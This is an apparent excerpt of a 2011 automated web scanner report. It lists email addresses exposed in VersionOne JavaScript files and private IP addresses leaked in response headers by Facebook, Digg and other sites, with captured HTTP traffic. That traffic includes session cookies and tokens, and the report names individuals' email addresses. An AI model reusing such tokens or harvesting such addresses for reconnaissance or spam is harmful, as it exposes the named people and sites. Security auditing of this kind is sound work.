Referer: http://pm.versionone.com/AgilePoster.html?c-aws=aps&gr-apss&v-010&gclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 4056
Content-Type: application/x-javascript
Last-Modified: Tue, 02 Mar 2010 07:15:07 GMT
Accept-Ranges: bytes
ETag: "18db8316d8b9ca1:2220"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:22:27 GMT

<!--
// Default text on search input
function clickclear(thisfield, defaulttext) {
if (thisfield.value == defaulttext) {
thisfield.value = "";
}
}
function clickrecall(thisfield, defaultt
...[SNIP]...
<a href=\""+emailCall+"pete@trailridgeconsulting.com\">
...[SNIP]...
<a href=\""+emailCall+"sales@featureplan.com\">sales@featureplan.com</a>
...[SNIP]...
<a href=\""+emailCall+"sales@automatedqa.com\">sales@automatedqa.com</a>
...[SNIP]...
<a href=\""+emailCall+"sales@atlassian.com\">sales@atlassian.com</a>
...[SNIP]...
<a href=\""+emailCall+"info@solutionsiq.com\">info@solutionsiq.com</a>
...[SNIP]...
<a href=\""+emailCall+"info@sligerconsulting.com\">
...[SNIP]...
<a href=\""+emailCall+"mike.shalloway@netobjectives.com\">
...[SNIP]...
<a href=\""+emailCall+"sanjiv.augustine@lithespeed.com\">
...[SNIP]...
<a href=\""+emailCall+"sanjiv.rdymond@innovel.net\">
...[SNIP]...
<a href=\""+emailCall+"david.hussman@devjam.com\">
...[SNIP]...
<a href=\""+emailCall+"ranton@ccpace.com\">
...[SNIP]...
<a href=\""+emailCall+"dmantica@aspetech.com\">
...[SNIP]...
<a href=\""+emailCall+"mary.anderson@3back.com\">
...[SNIP]...

23.74. http://www.versionone.com/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.versionone.com
Path:	/js/global.js

Issue detail

The following email addresses were disclosed in the response:

PartnerSales@VersionOne.com
david.hussman@devjam.com
dmantica@aspeinc.com
info@sligerconsulting.com
info@solutionsiq.com
mary.anderson@3back.com
mike.shalloway@netobjectives.com
pete@trailridgeconsulting.com
ranton@ccpace.com
sales@atlassian.com
sales@automatedqa.com
sales@featureplan.com
sanjiv.augustine@lithespeed.com
sanjiv.rdymond@innovel.net

Request

GET /js/global.js HTTP/1.1
Host: www.versionone.com
Proxy-Connection: keep-alive
Referer: http://www.versionone.com/Product/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; _mkto_trk=id:040-EEX-147&token:_mch-versionone.com-1311085361365-31952; __utma=174222397.1249898466.1311085361.1311085361.1311085361.1; __utmb=174222397.1.10.1311085361; __utmc=174222397; __utmz=174222397.1311085361.1.1.utmgclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ|utmccn=(not%20set)|utmcmd=(not%20set); s_vi=[CS]v1|2712C995051D310C-4000012AC02E50CA[CE]; ASPSESSIONIDCCQACASR=JNBKCBDCLNHEPCHJEOODAHCK; s_sq=vonenewprod%3D%2526pid%253Dlead%252520form%25253A%252520agile%252520poster%25253A%252520mkto%252520form%2526pidt%253D1%2526oid%253Dhttp%25253A//www.versionone.com/Product%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Length: 4436
Content-Type: application/x-javascript
Last-Modified: Wed, 07 Jul 2010 19:40:01 GMT
Accept-Ranges: bytes
ETag: "9c796330c1ecb1:2220"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:23:10 GMT

<!--
// Default text on search input
function clickclear(thisfield, defaulttext) {
if (thisfield.value == defaulttext) {
thisfield.value = "";
}
}
function clickrecall(thisfield, defaultt
...[SNIP]...
<a href=\""+emailCall+"partnersales"+host+"\">PartnerSales@VersionOne.com</a>
...[SNIP]...
<a href=\""+emailCall+"pete@trailridgeconsulting.com\">
...[SNIP]...
<a href=\""+emailCall+"sales@featureplan.com\">sales@featureplan.com</a>
...[SNIP]...
<a href=\""+emailCall+"sales@automatedqa.com\">sales@automatedqa.com</a>
...[SNIP]...
<a href=\""+emailCall+"sales@atlassian.com\">sales@atlassian.com</a>
...[SNIP]...
<a href=\""+emailCall+"info@solutionsiq.com\">info@solutionsiq.com</a>
...[SNIP]...
<a href=\""+emailCall+"info@sligerconsulting.com\">
...[SNIP]...
<a href=\""+emailCall+"mike.shalloway@netobjectives.com\">
...[SNIP]...
<a href=\""+emailCall+"sanjiv.augustine@lithespeed.com\">
...[SNIP]...
<a href=\""+emailCall+"sanjiv.rdymond@innovel.net\">
...[SNIP]...
<a href=\""+emailCall+"david.hussman@devjam.com\">
...[SNIP]...
<a href=\""+emailCall+"ranton@ccpace.com\">
...[SNIP]...
<a href=\""+emailCall+"dmantica@aspeinc.com\">
...[SNIP]...
<a href=\""+emailCall+"mary.anderson@3back.com\">
...[SNIP]...

23.75. http://www.versionone.com/js/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.versionone.com
Path:	/js/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /js/s_code.js HTTP/1.1
Host: www.versionone.com
Proxy-Connection: keep-alive
Referer: http://pm.versionone.com/AgilePoster.html?c-aws=aps&gr-apss&v-010&gclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 17730
Content-Type: application/x-javascript
Last-Modified: Wed, 28 Apr 2010 14:45:01 GMT
Accept-Ranges: bytes
ETag: "168f7361e1e6ca1:2220"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:22:29 GMT

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

24. Private IP addresses disclosed previous next
There are 253 instances of this issue:

http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js
http://developers.facebook.com/
http://developers.facebook.com/favicon.ico
http://developers.facebook.com/images/connect_showcase/platform_showcase_gallery_b.png
http://developers.facebook.com/images/devsite/icn_facebook_apps.png
http://developers.facebook.com/images/devsite/icn_mobile.png
http://developers.facebook.com/images/devsite/icn_open_source.png
http://digg.com/ajax/tooltip/submit
http://digg.com/submit
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://external.ak.fbcdn.net/safe_image.php
http://platform.ak.fbcdn.net/www/app_full_proxy.php
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/HHkUms5lcpx.css
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/vTlzK_6DGwe.css
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Mb-ySEi3O0b.css
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/r0jm6f8JtY2.css
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/rrdmptIcoxd.css
http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/PSpx_i42gvE.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4M_1PP4LZN8.js
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/ts_55XkdiUP.js
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3Y9Tu0WZkw.js
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/SK9j5prLTwj.css
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/wRBjYtc4wBS.js
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/-r69fEK9JXo.js
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/D-4QGnNagV6.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/zOMloODzDF_.css
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/BDfYGSOIQq_.css
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/KZtmMbNS3_L.css
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ubbnH6M9ljE.css
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/-Ho_EIT75He.css
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/2oQd79CdXv7.css
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/SNrGdWeoQHs.css
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/PVBa_VtP99O.css
http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/C9intiNq_3N.css
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PTQolaY4o54.css
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PzNsk8U51ji.css
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/y_PXXLWHa9g.js
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/08tONxelrvf.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/XByeV_qA1Uh.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/4F3Iv5NBJOL.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/lwKG0ViYlaK.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/2zvsC0zVzMB.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/FUYS70vIS4_.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/gQh69rr8JBH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/Bqaiy6eGUJa.css
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/gh8wxcAgNvK.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/87W0ancRJRW.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/_J12hr-nH-4.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/d3jsdgznlXU.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/x_JdY7BNW9-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/z_rHQCDmDDh.css
http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css
http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/xrEeXUiCo9E.js
http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/Kc1c3lfdICw.css
http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/a1RB0wRyoBD.css
http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/HTDWQBuWGI8.css
http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css
http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/j6Y0USeru-T.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/FnGB7tUxwE3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/c6emPCFfPcn.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/hkM0mPGHIE1.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9d2D5n1k9ZB.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/KdKjGooM6-s.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/7mqITnKP1S_.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/Sg28aMjfbGK.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/cwpj7clVond.css
http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/fM3yrUPcjJi.js
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JtYPs2Da_dw.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/NE1qNsIIHmi.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/PPCATkRjgbb.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/sz5xc1yg7bR.js
http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/7lH5BC-8hlS.css
http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/FmBZt5UgnLN.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/zpzCcjhbyCZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/DZLa1PZIieN.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/NGblq-c7mGZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/edfMk-9nmKj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/uYvCnbsceoH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/4Ese_3T2rw0.js
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/erCj3jAAsca.css
http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/6gpjXzvXDSF.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/DiI7ZwzsMWE.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/IOfrcReUvwR.js
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/nfbcyOQNzob.js
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/heGhkAidtX0.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/msTi-EL7vCK.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/otNsMnT3Ccb.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/aZS2cs-mE5h.css
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/kYoCeJwtttA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/Ci-JcEcsrg9.css
http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/LYx7X5wadgo.js
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/PCqjbIZdno-.css
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/qirUjHNG9oJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/0xUg4sx8bB2.js
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/OVLmRskybHj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/gdzYpes5-k7.js
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/7f4SE3bv4B2.css
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/SYIMzW6wi61.css
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/bDUZuV99E60.css
http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/KL99XeYC7AS.css
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/clJdoaAA7xi.js
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/POIirpFgl5q.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/Trz9qEKGISz.css
http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/5fFMnagjg2S.css
http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/AKFdbdR6W5B.css
http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/deIrY85PE2v.png
http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/ukvLMiNkr_t.png
http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/v3dJrMQoPk1.png
http://static.ak.fbcdn.net/rsrc.php/v1/z1/r/qcTMR8qeslF.png
http://static.ak.fbcdn.net/rsrc.php/v1/z4/r/EAbydW1M_XR.png
http://static.ak.fbcdn.net/rsrc.php/v1/z6/r/l9Fe9Ugss0S.gif
http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/UvyvLtJTQzO.png
http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/Z6rULnd-GE-.png
http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/e4jQ5MXLYQ8.png
http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/TwAHgQi2ZPB.png
http://static.ak.fbcdn.net/rsrc.php/v1/zB/r/Unmn04Ngmxd.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/hIGTc2UFq5P.png
http://static.ak.fbcdn.net/rsrc.php/v1/zE/r/eh0bmn9m_mm.png
http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png
http://static.ak.fbcdn.net/rsrc.php/v1/zI/r/llncLdVc0JC.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zJ/r/RVElCNYrs5z.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/7ngmhwdsni2.png
http://static.ak.fbcdn.net/rsrc.php/v1/zP/r/FzmFaNDPhjU.png
http://static.ak.fbcdn.net/rsrc.php/v1/zQ/r/WBWgBVeCy7Y.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/6DyuwYMrMc0.png
http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/ccgKJX0yQZC.png
http://static.ak.fbcdn.net/rsrc.php/v1/zT/r/dDagbUnwf34.png
http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/gLuMARNlxxj.png
http://static.ak.fbcdn.net/rsrc.php/v1/zV/r/-pf2bdz3vEg.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/1gBp2bDGEuh.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/6HL8HSM452G.png
http://static.ak.fbcdn.net/rsrc.php/v1/z_/r/2Oin6nHA4Mx.png
http://static.ak.fbcdn.net/rsrc.php/v1/zb/r/3LyZkLVshsc.gif
http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/1x0T5GU6FqP.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zh/r/HNHvoJkgN6x.png
http://static.ak.fbcdn.net/rsrc.php/v1/zi/r/PbmUudSYZ0z.png
http://static.ak.fbcdn.net/rsrc.php/v1/zl/r/6N9FQPpTHCy.png
http://static.ak.fbcdn.net/rsrc.php/v1/zp/r/-dio0u9UIlC.png
http://static.ak.fbcdn.net/rsrc.php/v1/zr/r/XXVvDYAks_i.png
http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/YoX0fw76s5z.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zs/r/fzdZPrLUwxB.png
http://static.ak.fbcdn.net/rsrc.php/v1/zu/r/Y4_2_kJqyhn.gif
http://static.ak.fbcdn.net/rsrc.php/v1/zx/r/cDpiVvg8Q0u.png
http://static.ak.fbcdn.net/rsrc.php/v1/zz/r/z1xzUcShxUD.png
http://vimeo.com/moogaloop.swf
http://vimeo.com/moogaloop.swf
http://vimeo.com/moogaloop.swf
http://vimeo.com/moogaloop.swf
http://www.facebook.com/advertising/
http://www.facebook.com/ajax/connect/connect_widget.php
http://www.facebook.com/ajax/connect/connect_widget.php
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/prefetch.php
http://www.facebook.com/ajax/prefetch.php
http://www.facebook.com/badges
http://www.facebook.com/badges/
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/captcha/tfbimage.php
http://www.facebook.com/careers/
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/facebook
http://www.facebook.com/favicon.ico
http://www.facebook.com/find-friends
http://www.facebook.com/help/
http://www.facebook.com/images/contact_importer/login_button/yahoo.png
http://www.facebook.com/images/loaders/indicator_black.gif
http://www.facebook.com/images/registration_graphic.png
http://www.facebook.com/mobile
http://www.facebook.com/mobile/
http://www.facebook.com/pages/create.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/terms.php
http://www.gamestop.com/
http://www.google.com/sdch/StnTz5pY.dct

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

24.1. http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn2.diggstatic.com
Path:	/js/two_column/lib.61fe8366.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.128.186

Request

GET /js/two_column/lib.61fe8366.js HTTP/1.1
Host: cdn2.diggstatic.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=25569 10.2.128.186
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 166188
Accept-Ranges: bytes
Cache-Control: private, max-age=31536000
Age: 0
Expires: Wed, 18 Jul 2012 14:28:29 GMT
X-CDN: Cotendo
Connection: Keep-Alive

(function(d,f){function j(a,b,e){if(e===f&&a.nodeType===1){e=a.getAttribute("data-"+b);if(typeof e==="string"){try{e=e==="true"?true:e==="false"?false:e==="null"?null:!c.isNaN(e)?parseFloat(e):na.test
...[SNIP]...

24.2. http://developers.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.131.111

Request

Response

24.3. http://developers.facebook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.145.113

Request

GET /favicon.ico HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; wd=1065x723

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/x-icon
Expires: Thu, 18 Aug 2011 14:57:57 GMT
X-FB-Server: 10.32.145.113
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:57 GMT
Content-Length: 1150

..............h.......(....... ..... .....@........................................................................................ya..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..Y;..ya..........bE...
...[SNIP]...

24.4. http://developers.facebook.com/images/connect_showcase/platform_showcase_gallery_b.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/images/connect_showcase/platform_showcase_gallery_b.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.136.116

Request

GET /images/connect_showcase/platform_showcase_gallery_b.png HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
Referer: http://developers.facebook.com/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

